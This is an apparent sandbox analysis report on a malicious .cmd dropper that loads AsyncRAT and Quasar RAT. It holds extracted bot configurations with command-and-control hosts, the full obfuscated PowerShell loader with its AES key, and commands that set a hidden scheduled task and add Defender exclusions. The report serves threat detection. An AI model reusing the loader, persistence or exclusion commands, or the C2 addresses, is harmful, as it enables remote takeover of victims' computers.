asyncrat | 49b3b5ed8b4bab226241223f2004d96cd7975d62375dfbffbfe2212c1e4d52f8

Analysis

max time kernel
107s
max time network
121s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
11-11-2024 20:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49b3b5ed8b4bab226241223f2004d96cd7975d62375dfbffbfe2212c1e4d52f8.cmd
Size

84KB
MD5

de084a193f3bf453afd0642a1e171dce
SHA1

df67591cdbf7fae865b3ef5807f24a81be4394cd
SHA256

49b3b5ed8b4bab226241223f2004d96cd7975d62375dfbffbfe2212c1e4d52f8
SHA512

36bc60a4f2a35fe17e40e0eb07384c4e3e6c7bab85beb1d6a4f32b9a4f419ea37dc8ace1e45dbf14c74fee6eeb163c2d321fb83cca390bb137991abead0a490e
SSDEEP

1536:cIuyBCE+h2KyBCE+h2wG2YCHMrznL/kDxhwAGp2hc0dn9:cdyBCfh/yBCfhnF2vL6O2hc0dn9

Score

10^/10

asyncrat quasar fawzair1d office04 discovery execution rat spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes

encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

asyncrat

Version

AWS | RxR

Botnet

fawzair1d

go2.adrsxpjm0rga0n.de:6606

go2.adrsxpjm0rga0n.de:7707

go2.adrsxpjm0rga0n.de:8808

Mutex

dtvhcrw_fawziir

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/1264-98-0x0000000009B20000-0x0000000009E44000-memory.dmp	family_quasar

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/3596-133-0x00000000074B0000-0x00000000074C6000-memory.dmp	family_asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
18	3596	powershell.exe
25	1264	powershell.exe
28	1264	powershell.exe
31	1264	powershell.exe
35	3596	powershell.exe
37	3596	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2180	powershell.exe
3596	powershell.exe
1264	powershell.exe
2492	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3596	powershell.exe
3596	powershell.exe
4708	powershell.exe
4708	powershell.exe
1264	powershell.exe
1264	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
2492	powershell.exe
2492	powershell.exe
3596	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeIncreaseQuotaPrivilege	4708	powershell.exe
Token: SeSecurityPrivilege	4708	powershell.exe
Token: SeTakeOwnershipPrivilege	4708	powershell.exe
Token: SeLoadDriverPrivilege	4708	powershell.exe
Token: SeSystemProfilePrivilege	4708	powershell.exe
Token: SeSystemtimePrivilege	4708	powershell.exe
Token: SeProfSingleProcessPrivilege	4708	powershell.exe
Token: SeIncBasePriorityPrivilege	4708	powershell.exe
Token: SeCreatePagefilePrivilege	4708	powershell.exe
Token: SeBackupPrivilege	4708	powershell.exe
Token: SeRestorePrivilege	4708	powershell.exe
Token: SeShutdownPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeSystemEnvironmentPrivilege	4708	powershell.exe
Token: SeRemoteShutdownPrivilege	4708	powershell.exe
Token: SeUndockPrivilege	4708	powershell.exe
Token: SeManageVolumePrivilege	4708	powershell.exe
Token: 33	4708	powershell.exe
Token: 34	4708	powershell.exe
Token: 35	4708	powershell.exe
Token: 36	4708	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeIncreaseQuotaPrivilege	2180	powershell.exe
Token: SeSecurityPrivilege	2180	powershell.exe
Token: SeTakeOwnershipPrivilege	2180	powershell.exe
Token: SeLoadDriverPrivilege	2180	powershell.exe
Token: SeSystemProfilePrivilege	2180	powershell.exe
Token: SeSystemtimePrivilege	2180	powershell.exe
Token: SeProfSingleProcessPrivilege	2180	powershell.exe
Token: SeIncBasePriorityPrivilege	2180	powershell.exe
Token: SeCreatePagefilePrivilege	2180	powershell.exe
Token: SeBackupPrivilege	2180	powershell.exe
Token: SeRestorePrivilege	2180	powershell.exe
Token: SeShutdownPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeSystemEnvironmentPrivilege	2180	powershell.exe
Token: SeRemoteShutdownPrivilege	2180	powershell.exe
Token: SeUndockPrivilege	2180	powershell.exe
Token: SeManageVolumePrivilege	2180	powershell.exe
Token: 33	2180	powershell.exe
Token: 34	2180	powershell.exe
Token: 35	2180	powershell.exe
Token: 36	2180	powershell.exe
Token: SeIncreaseQuotaPrivilege	2180	powershell.exe
Token: SeSecurityPrivilege	2180	powershell.exe
Token: SeTakeOwnershipPrivilege	2180	powershell.exe
Token: SeLoadDriverPrivilege	2180	powershell.exe
Token: SeSystemProfilePrivilege	2180	powershell.exe
Token: SeSystemtimePrivilege	2180	powershell.exe
Token: SeProfSingleProcessPrivilege	2180	powershell.exe
Token: SeIncBasePriorityPrivilege	2180	powershell.exe
Token: SeCreatePagefilePrivilege	2180	powershell.exe
Token: SeBackupPrivilege	2180	powershell.exe
Token: SeRestorePrivilege	2180	powershell.exe
Token: SeShutdownPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeSystemEnvironmentPrivilege	2180	powershell.exe
Token: SeRemoteShutdownPrivilege	2180	powershell.exe
Token: SeUndockPrivilege	2180	powershell.exe
Token: SeManageVolumePrivilege	2180	powershell.exe
Token: 33	2180	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1264	powershell.exe
3596	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1236 wrote to memory of 2004	1236	cmd.exe	84
PID 1236 wrote to memory of 2004	1236	cmd.exe	84
PID 1236 wrote to memory of 3596	1236	cmd.exe	85
PID 1236 wrote to memory of 3596	1236	cmd.exe	85
PID 1236 wrote to memory of 3596	1236	cmd.exe	85
PID 3596 wrote to memory of 2344	3596	powershell.exe	90
PID 3596 wrote to memory of 2344	3596	powershell.exe	90
PID 3596 wrote to memory of 2344	3596	powershell.exe	90
PID 3596 wrote to memory of 4708	3596	powershell.exe	92
PID 3596 wrote to memory of 4708	3596	powershell.exe	92
PID 3596 wrote to memory of 4708	3596	powershell.exe	92
PID 2344 wrote to memory of 4244	2344	cmd.exe	95
PID 2344 wrote to memory of 4244	2344	cmd.exe	95
PID 2344 wrote to memory of 4244	2344	cmd.exe	95
PID 2344 wrote to memory of 1264	2344	cmd.exe	96
PID 2344 wrote to memory of 1264	2344	cmd.exe	96
PID 2344 wrote to memory of 1264	2344	cmd.exe	96
PID 3596 wrote to memory of 2180	3596	powershell.exe	100
PID 3596 wrote to memory of 2180	3596	powershell.exe	100
PID 3596 wrote to memory of 2180	3596	powershell.exe	100
PID 3596 wrote to memory of 2492	3596	powershell.exe	102
PID 3596 wrote to memory of 2492	3596	powershell.exe	102
PID 3596 wrote to memory of 2492	3596	powershell.exe	102

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\49b3b5ed8b4bab226241223f2004d96cd7975d62375dfbffbfe2212c1e4d52f8.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('df/K/tEiYdy4jDQqWu82IGU7CDWjtcqI6TPSAtqO3nc='); $aes_var.IV=[System.Convert]::FromBase64String('TTvBduAqbgv9Ip8d+x8Vxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$vEBwF=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$KaKkY=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CvaYN=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($vEBwF, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CvaYN.CopyTo($KaKkY); $CvaYN.Dispose(); $vEBwF.Dispose(); $KaKkY.Dispose(); $KaKkY.ToArray();}function execute_function($param_var,$param2_var){ IEX '$rDUDj=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$VYOoA=$rDUDj.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$VYOoA.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$BpVEz = 'C:\Users\Admin\AppData\Local\Temp\49b3b5ed8b4bab226241223f2004d96cd7975d62375dfbffbfe2212c1e4d52f8.cmd';$host.UI.RawUI.WindowTitle = $BpVEz;$Xepwl=[System.IO.File]::ReadAllText($BpVEz).Split([Environment]::NewLine);foreach ($YoWao in $Xepwl) { if ($YoWao.StartsWith('RqExLvSrPZrHekygZVyr')) { $QwJqW=$YoWao.Substring(20); break; }}$payloads_var=[string[]]$QwJqW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:2004
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\test.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QbyHvTiQtx89YnRta8IEyPqtyneJjEN3sJ2ZhbHVoLs='); $aes_var.IV=[System.Convert]::FromBase64String('OxX1X2lNZIgN15fz3vySVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$xCITj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$tIajX=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$FlQAx=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($xCITj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $FlQAx.CopyTo($tIajX); $FlQAx.Dispose(); $xCITj.Dispose(); $tIajX.Dispose(); $tIajX.ToArray();}function execute_function($param_var,$param2_var){ IEX '$GhsFa=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$kwssa=$GhsFa.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$kwssa.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$FFjjS = 'C:\Users\Admin\AppData\Roaming\temp\test.cmd';$host.UI.RawUI.WindowTitle = $FFjjS;$kRRdo=[System.IO.File]::ReadAllText($FFjjS).Split([Environment]::NewLine);foreach ($smNgX in $kRRdo) { if ($smNgX.StartsWith('luZsHxYvUgyKYktkRiik')) { $gnoFR=$smNgX.Substring(20); break; }}$payloads_var=[string[]]$gnoFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      4⤵
      System Location Discovery: System Language Discovery
      PID:4244
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\49b3b5ed8b4bab226241223f2004d96cd7975d62375dfbffbfe2212c1e4d52f8')
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-OneNotestartup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
f8634c179c1a738e20815ec466527e78

SHA1
5ff99194f001b39289485a6c6fa0ba8b5f50aa42

SHA256
b97b56e7ceecc7fe39522d3989d98bd233353d0269a7f6517e4a8286b4ed1dc4

SHA512
806b40ab4b2cd38140210d1bff3317d51af96008526298aee07e67fa858d5e9646ba594d87a5f22ec5026ee25b93f62d600eb6da92216dfb524b28260fa7388f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
11ae007519c81a4eee8a90bdb5690b6d

SHA1
68e08d234e54949aea06887766768550eced02c3

SHA256
af4e16211103ba05eea781e5f09933c8bf000026687604839c9d23a1025b305e

SHA512
b4ccb1a377e6ceee03fa6d34c3b318feb25a9d7a7ad4424e3b7e3d6cbaaedfb9b913dd249a07b40efc313b64e437a227f4380d4fbd3a489011b1fe4506c15ceb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
33dbc9506f75d9fbd58f076cb646cccf

SHA1
3487eba0672ad16fa2ab2cd3bd2179e4a4339853

SHA256
b7f4aa607043c3d397ca5b9a7f68afe8707ca554562eb158be6d3cfb96b133d0

SHA512
19c54fe83d6bf82166c4f5e6d2009a2c2fc4c836c57878bc00a07d14187ec129e5f5d349c22bacbf5150250350cf79d50489befe146cfee71e8fcf5209ca49e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
5a6ecaaa784352a07b65dd8abd4a19b4

SHA1
b668e9d83e7d1501f4d1053827a14fcc41f431e7

SHA256
af5597aef23a5ab235f6843cd6c8f66eebb7f70806fc788c181000d3089e5655

SHA512
aa303f9d19acb794eb0b181e4257478052cb7e05a07cf893baec07f291622a82c47f118e021084a42f573b99547e85a9a0b21699a773a2d73a32959a083cfbbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tvb2gfoe.40l.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\temp\test.cmd

Filesize
1.6MB

MD5
846debdd4c489b9cdf58cf035011385b

SHA1
edd9486a627bc3f35772e2e79eb7a3aa021569cd

SHA256
113c957ba369a4bea2068a9d5596f644e365cb81c19a28cce8ca1382ccc08e2d

SHA512
c46b02e2a54314bca1695e03196a7041aebe5bede3e857f62e0e634cc2c4ea9ed95d569a73c2b6c935afab5a961a0253ce40988e3c65d9ff33bbaa34a2376f51

Download Submit
memory/1264-86-0x0000000000720000-0x000000000072C000-memory.dmp

Filesize
48KB

Download
memory/1264-104-0x000000000DE60000-0x000000000E478000-memory.dmp

Filesize
6.1MB

Download
memory/1264-130-0x000000000DBD0000-0x000000000DBE2000-memory.dmp

Filesize
72KB

Download
memory/1264-103-0x000000000F2F0000-0x000000000F4B2000-memory.dmp

Filesize
1.8MB

Download
memory/1264-102-0x000000000A010000-0x000000000A0C2000-memory.dmp

Filesize
712KB

Download
memory/1264-101-0x0000000009E90000-0x0000000009EE0000-memory.dmp

Filesize
320KB

Download
memory/1264-100-0x00000000072B0000-0x00000000072BA000-memory.dmp

Filesize
40KB

Download
memory/1264-99-0x00000000072C0000-0x0000000007352000-memory.dmp

Filesize
584KB

Download
memory/1264-98-0x0000000009B20000-0x0000000009E44000-memory.dmp

Filesize
3.1MB

Download
memory/1264-131-0x000000000DC30000-0x000000000DC6C000-memory.dmp

Filesize
240KB

Download
memory/1264-87-0x0000000007040000-0x0000000007172000-memory.dmp

Filesize
1.2MB

Download
memory/2180-88-0x0000000071500000-0x000000007154C000-memory.dmp

Filesize
304KB

Download
memory/2492-119-0x0000000071500000-0x000000007154C000-memory.dmp

Filesize
304KB

Download
memory/2492-129-0x00000000071D0000-0x0000000007273000-memory.dmp

Filesize
652KB

Download
memory/3596-21-0x0000000006E90000-0x0000000006F06000-memory.dmp

Filesize
472KB

Download
memory/3596-13-0x0000000005460000-0x00000000057B7000-memory.dmp

Filesize
3.3MB

Download
memory/3596-36-0x00000000753AE000-0x00000000753AF000-memory.dmp

Filesize
4KB

Download
memory/3596-37-0x00000000753A0000-0x0000000075B51000-memory.dmp

Filesize
7.7MB

Download
memory/3596-1-0x00000000024C0000-0x00000000024F6000-memory.dmp

Filesize
216KB

Download
memory/3596-135-0x0000000007F90000-0x000000000802C000-memory.dmp

Filesize
624KB

Download
memory/3596-133-0x00000000074B0000-0x00000000074C6000-memory.dmp

Filesize
88KB

Download
memory/3596-2-0x00000000753A0000-0x0000000075B51000-memory.dmp

Filesize
7.7MB

Download
memory/3596-3-0x0000000004D90000-0x000000000545A000-memory.dmp

Filesize
6.8MB

Download
memory/3596-4-0x00000000753A0000-0x0000000075B51000-memory.dmp

Filesize
7.7MB

Download
memory/3596-5-0x0000000004BF0000-0x0000000004C12000-memory.dmp

Filesize
136KB

Download
memory/3596-6-0x0000000004C90000-0x0000000004CF6000-memory.dmp

Filesize
408KB

Download
memory/3596-7-0x0000000004D00000-0x0000000004D66000-memory.dmp

Filesize
408KB

Download
memory/3596-26-0x00000000081C0000-0x0000000008766000-memory.dmp

Filesize
5.6MB

Download
memory/3596-25-0x0000000007050000-0x0000000007060000-memory.dmp

Filesize
64KB

Download
memory/3596-24-0x0000000007030000-0x000000000703C000-memory.dmp

Filesize
48KB

Download
memory/3596-23-0x0000000006F10000-0x0000000006F2A000-memory.dmp

Filesize
104KB

Download
memory/3596-22-0x0000000007590000-0x0000000007C0A000-memory.dmp

Filesize
6.5MB

Download
memory/3596-0-0x00000000753AE000-0x00000000753AF000-memory.dmp

Filesize
4KB

Download
memory/3596-20-0x0000000006D30000-0x0000000006D74000-memory.dmp

Filesize
272KB

Download
memory/3596-19-0x0000000005BB0000-0x0000000005BFC000-memory.dmp

Filesize
304KB

Download
memory/3596-18-0x0000000005B40000-0x0000000005B5E000-memory.dmp

Filesize
120KB

Download
memory/4708-35-0x00000000753A0000-0x0000000075B51000-memory.dmp

Filesize
7.7MB

Download
memory/4708-34-0x00000000753A0000-0x0000000075B51000-memory.dmp

Filesize
7.7MB

Download
memory/4708-74-0x00000000753A0000-0x0000000075B51000-memory.dmp

Filesize
7.7MB

Download
memory/4708-71-0x0000000007EB0000-0x0000000007EC1000-memory.dmp

Filesize
68KB

Download
memory/4708-70-0x0000000007F40000-0x0000000007FD6000-memory.dmp

Filesize
600KB

Download
memory/4708-69-0x0000000007D30000-0x0000000007D3A000-memory.dmp

Filesize
40KB

Download
memory/4708-68-0x0000000007C20000-0x0000000007CC3000-memory.dmp

Filesize
652KB

Download
memory/4708-67-0x0000000006F20000-0x0000000006F3E000-memory.dmp

Filesize
120KB

Download
memory/4708-57-0x0000000071500000-0x000000007154C000-memory.dmp

Filesize
304KB

Download
memory/4708-56-0x0000000007B30000-0x0000000007B62000-memory.dmp

Filesize
200KB

Download